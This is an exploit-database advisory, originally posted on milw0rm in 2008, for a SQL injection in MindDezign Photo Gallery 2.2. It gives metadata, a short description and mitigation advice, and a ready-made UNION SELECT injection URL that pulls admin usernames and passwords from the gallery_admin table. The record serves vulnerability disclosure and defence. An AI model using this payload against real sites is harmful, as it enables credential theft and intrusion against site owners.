MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability

vendor:

MindDezign Photo Gallery

by:

CWH Underground

8.8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: MindDezign Photo Gallery

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: NO

Related CWE: N/A

CPE: a:minddezign:minddezign_photo_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability

A vulnerability exists in MindDezign Photo Gallery 2.2, which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'index.php' script. Magic Quote must be turned off for the exploit to work. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable script. The request contains an SQL injection payload in the 'id' parameter. The payload is then executed by the backend database, allowing the attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

Ensure that Magic Quote is turned on and that all user-supplied input is properly sanitized and validated.

Source

Exploit-DB raw data:

==================================================================================
  MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability
==================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 23 October 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : MindDezign Photo Gallery
VERSION	    : 2.2
DOWNLOAD    : http://gallery.minddezign.com/?module=download
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **


[+] Vulnerable in index.php (id)

---------
 Exploit
---------

[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin--


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-10-23]